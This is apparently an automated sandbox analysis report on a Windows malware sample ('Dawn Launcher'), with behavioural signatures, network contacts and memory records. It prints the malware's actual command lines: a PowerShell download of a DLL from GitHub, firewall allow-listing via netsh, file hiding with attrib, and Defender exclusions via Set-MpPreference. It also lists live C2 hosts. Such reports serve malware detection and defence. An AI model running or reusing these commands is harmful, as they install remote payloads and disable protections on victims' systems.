Analysis Overview
SHA256
ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
Threat Level: Known bad
The file aa947ac87e8151f7a183a3ce9b0d5860.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Sets file to hidden
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-07 19:22
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-07 19:22
Reported
2024-01-07 19:25
Platform
win10v2004-20231222-en
Max time kernel
1s
Max time network
152s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Dawn.exe |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe
"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\Dawn.exe
"C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
C:\Windows\SysWOW64\certutil.exe
certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5020 -ip 5020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 2620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.181.190.20.in-addr.arpa | udp |
| FR | 51.38.37.194:7981 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| FR | 51.38.37.194:7981 | tcp | |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.91.104.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| GB | 96.17.179.48:80 | tcp | |
| GB | 96.17.179.48:80 | tcp | |
| GB | 96.17.179.48:80 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| GB | 88.221.135.217:80 | tcp |
Files
memory/5116-0-0x0000000075390000-0x0000000075B40000-memory.dmp
memory/5116-1-0x00000000004A0000-0x00000000012D6000-memory.dmp
memory/5116-3-0x0000000005CF0000-0x0000000005D8C000-memory.dmp
memory/5116-2-0x0000000006200000-0x00000000067A4000-memory.dmp
memory/5116-5-0x0000000005F40000-0x0000000005F50000-memory.dmp
memory/5116-4-0x0000000005D90000-0x0000000005DF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1232-14-0x00007FFE4C510000-0x00007FFE4C512000-memory.dmp
memory/1232-16-0x00007FFE4C530000-0x00007FFE4C532000-memory.dmp
memory/1232-17-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/1232-21-0x00007FFE4C570000-0x00007FFE4C572000-memory.dmp
memory/1232-27-0x00007FFE4C5D0000-0x00007FFE4C5D2000-memory.dmp
memory/1232-26-0x00007FFE4C5C0000-0x00007FFE4C5C2000-memory.dmp
memory/1232-29-0x00007FFE4C5F0000-0x00007FFE4C5F2000-memory.dmp
memory/1232-31-0x00007FFE4C610000-0x00007FFE4C612000-memory.dmp
memory/1232-30-0x00007FFE4C600000-0x00007FFE4C602000-memory.dmp
memory/1232-32-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/1232-28-0x00007FFE4C5E0000-0x00007FFE4C5E2000-memory.dmp
memory/1232-25-0x00007FFE4C5B0000-0x00007FFE4C5B2000-memory.dmp
memory/1232-24-0x00007FFE4C5A0000-0x00007FFE4C5A2000-memory.dmp
memory/1232-23-0x00007FFE4C590000-0x00007FFE4C592000-memory.dmp
memory/1232-22-0x00007FFE4C580000-0x00007FFE4C582000-memory.dmp
memory/1232-20-0x00007FFE4C560000-0x00007FFE4C562000-memory.dmp
memory/1232-19-0x00007FFE4C550000-0x00007FFE4C552000-memory.dmp
memory/1232-18-0x00007FFE4C540000-0x00007FFE4C542000-memory.dmp
memory/1232-15-0x00007FFE4C520000-0x00007FFE4C522000-memory.dmp
memory/5116-40-0x0000000075390000-0x0000000075B40000-memory.dmp
memory/5020-43-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/5020-44-0x0000000005A50000-0x0000000005A60000-memory.dmp
memory/1232-53-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/3128-71-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/3128-75-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/5020-78-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/5020-83-0x0000000005A50000-0x0000000005A60000-memory.dmp
memory/1620-87-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1620-88-0x0000000005530000-0x0000000005B58000-memory.dmp
memory/1620-90-0x0000000005B60000-0x0000000005BC6000-memory.dmp
memory/1620-100-0x0000000005ED0000-0x0000000006224000-memory.dmp
memory/1620-89-0x0000000005400000-0x0000000005422000-memory.dmp
memory/1620-101-0x00000000063C0000-0x00000000063DE000-memory.dmp
memory/1620-102-0x0000000006400000-0x000000000644C000-memory.dmp
memory/1620-86-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1620-85-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/1620-84-0x0000000002AA0000-0x0000000002AD6000-memory.dmp
memory/1620-104-0x00000000068C0000-0x00000000068DA000-memory.dmp
memory/1620-103-0x0000000007AC0000-0x000000000813A000-memory.dmp
memory/1620-110-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/5020-111-0x0000000075310000-0x0000000075AC0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-07 19:22
Reported
2024-01-07 19:25
Platform
win7-20231129-en
Max time kernel
5s
Max time network
140s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\libcrypto-1_1.dll | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| File created | C:\Windows\SysWOW64\libssl-1_1.dll | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe
"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\Dawn.exe
"C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
C:\Windows\SysWOW64\certutil.exe
certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit
Network
| Country | Destination | Domain | Proto |
| FR | 51.38.37.194:7981 | tcp | |
| FR | 51.38.37.194:7981 | tcp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | Buju.duckdns.org | udp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| US | 8.8.8.8:53 | Buju.duckdns.org | udp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
Files
memory/2320-1-0x00000000010B0000-0x0000000001EE6000-memory.dmp
memory/2320-0-0x0000000073F30000-0x000000007461E000-memory.dmp
\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 023866645753eaaf44d90d52b1318774 |
| SHA1 | 494b387fbf69c9217c7a59dff4c583c58ae97087 |
| SHA256 | 073e485754cba379c158a1e74cb9d38980cd7aa2bf209b3b43e96b8112a67644 |
| SHA512 | f0f6e62a36fe8180354af223ea7851eb2933267b0b1da8a6d84d3737156df168ffe6f0da0674f77bf68a1203375828dc0bf72ae4351ffedb3f1a0bc0b80a82be |
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 7cb160b0abe15b3cea529ca00f880b63 |
| SHA1 | c620a6386f68ff31251e1fe0f774fde80d40399f |
| SHA256 | cc594ca27a74f5c1ab71db3c980c8cb0007a23a84414f3a32ebc92ea95ec82cd |
| SHA512 | 9ab45cc406634b30dfd0686bf2f6c502a1f09f85ddd31048473ce3e7ad681296ff2aad69cbb8a2e978272a5194528d8df25336c555e5e8af15b3338808b67936 |
\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | dd17771ebc61382ea1d84832cd2d886a |
| SHA1 | e2ea1805181ee8beb5d717e6679a3eada8b46d66 |
| SHA256 | 9c818d0262c7d1c2ec2c1271ceed8bbb6259341f3d880337afaea0dd772e322e |
| SHA512 | 56089fb66283b771d2e0f7674624c418c0b7d41bf7430df8965207a2bdbffda8ee862913892f0a8da7cfa208e864f3fdc64336c46f1094fb29f1d34154df528d |
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 4742731bb77c1d125809906c7dafee17 |
| SHA1 | c70c2452a184ee3dbaeb5f566569bc235648844d |
| SHA256 | 93ee7f985541332f97d1379c180b31dc185ce283cb32e93115bb75650c33e370 |
| SHA512 | 414563c70b97e957cfbc76d344dd64e8a67bdadd606a59178a0b96f80778c42ffaad7e4d4e58dfefbb5982a699165a0ba4d171d006345e79937780d7b63a40b9 |
memory/2088-14-0x0000000076EE0000-0x0000000076EE2000-memory.dmp
memory/2088-17-0x0000000076EF0000-0x0000000076EF2000-memory.dmp
memory/2088-25-0x0000000076F00000-0x0000000076F02000-memory.dmp
memory/2088-36-0x0000000076F20000-0x0000000076F22000-memory.dmp
memory/2088-42-0x0000000076F30000-0x0000000076F32000-memory.dmp
memory/2088-48-0x0000000076F40000-0x0000000076F42000-memory.dmp
memory/2088-50-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-54-0x0000000076F50000-0x0000000076F52000-memory.dmp
memory/2088-65-0x0000000076F70000-0x0000000076F72000-memory.dmp
memory/2320-67-0x0000000073F30000-0x000000007461E000-memory.dmp
memory/2088-78-0x0000000076F90000-0x0000000076F92000-memory.dmp
memory/2088-81-0x0000000076FA0000-0x0000000076FA2000-memory.dmp
memory/2088-86-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/2088-88-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-94-0x0000000076FB0000-0x0000000076FB2000-memory.dmp
memory/2088-92-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-79-0x0000000076FA0000-0x0000000076FA2000-memory.dmp
memory/2088-109-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-76-0x0000000076F90000-0x0000000076F92000-memory.dmp
memory/2088-74-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-73-0x0000000076F90000-0x0000000076F92000-memory.dmp
memory/2088-72-0x0000000076F80000-0x0000000076F82000-memory.dmp
memory/2088-70-0x0000000076F80000-0x0000000076F82000-memory.dmp
memory/2088-69-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-66-0x0000000076F80000-0x0000000076F82000-memory.dmp
memory/2088-63-0x0000000076F70000-0x0000000076F72000-memory.dmp
memory/2088-61-0x0000000076F70000-0x0000000076F72000-memory.dmp
memory/2088-60-0x0000000076F60000-0x0000000076F62000-memory.dmp
memory/2088-58-0x0000000076F60000-0x0000000076F62000-memory.dmp
memory/2088-56-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-55-0x0000000076F60000-0x0000000076F62000-memory.dmp
memory/2088-52-0x0000000076F50000-0x0000000076F52000-memory.dmp
memory/2088-49-0x0000000076F50000-0x0000000076F52000-memory.dmp
memory/2088-46-0x0000000076F40000-0x0000000076F42000-memory.dmp
memory/2088-44-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-43-0x0000000076F40000-0x0000000076F42000-memory.dmp
memory/2088-40-0x0000000076F30000-0x0000000076F32000-memory.dmp
memory/2088-38-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-37-0x0000000076F30000-0x0000000076F32000-memory.dmp
memory/2088-34-0x0000000076F20000-0x0000000076F22000-memory.dmp
memory/2088-32-0x0000000076F20000-0x0000000076F22000-memory.dmp
memory/2088-31-0x0000000076F10000-0x0000000076F12000-memory.dmp
memory/2088-29-0x0000000076F10000-0x0000000076F12000-memory.dmp
memory/2088-27-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-26-0x0000000076F10000-0x0000000076F12000-memory.dmp
memory/2088-23-0x0000000076F00000-0x0000000076F02000-memory.dmp
memory/2088-21-0x0000000076F00000-0x0000000076F02000-memory.dmp
memory/2088-20-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-19-0x0000000076EF0000-0x0000000076EF2000-memory.dmp
memory/2088-15-0x0000000076EF0000-0x0000000076EF2000-memory.dmp
memory/2088-12-0x0000000076EE0000-0x0000000076EE2000-memory.dmp
memory/2088-10-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/2088-9-0x0000000076EE0000-0x0000000076EE2000-memory.dmp
memory/2320-116-0x0000000073F30000-0x000000007461E000-memory.dmp
memory/872-119-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/872-121-0x00000000009F0000-0x0000000001826000-memory.dmp
memory/2088-120-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-128-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/2088-129-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/3060-143-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-163-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-173-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-152-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-180-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-191-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-197-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-202-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/872-214-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/3060-216-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-226-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/3060-228-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-231-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/872-232-0x0000000005530000-0x0000000005570000-memory.dmp
memory/3060-234-0x0000000076D30000-0x0000000076ED9000-memory.dmp
memory/3060-233-0x0000000140000000-0x0000000141F88000-memory.dmp
memory/2660-251-0x00000000028B0000-0x00000000028F0000-memory.dmp
memory/2660-252-0x000000006E510000-0x000000006EABB000-memory.dmp
memory/2660-250-0x00000000028B0000-0x00000000028F0000-memory.dmp
memory/2660-249-0x00000000028B0000-0x00000000028F0000-memory.dmp
memory/2660-248-0x000000006E510000-0x000000006EABB000-memory.dmp
memory/2660-255-0x000000006E510000-0x000000006EABB000-memory.dmp
memory/872-256-0x0000000005530000-0x0000000005570000-memory.dmp
memory/2424-271-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2424-273-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2476-274-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2424-276-0x0000000002960000-0x00000000029A0000-memory.dmp
memory/2424-277-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2476-279-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2476-278-0x000000006E380000-0x000000006E92B000-memory.dmp
memory/2476-275-0x0000000002B60000-0x0000000002BA0000-memory.dmp
memory/2424-272-0x0000000002960000-0x00000000029A0000-memory.dmp
memory/2476-280-0x000000006E380000-0x000000006E92B000-memory.dmp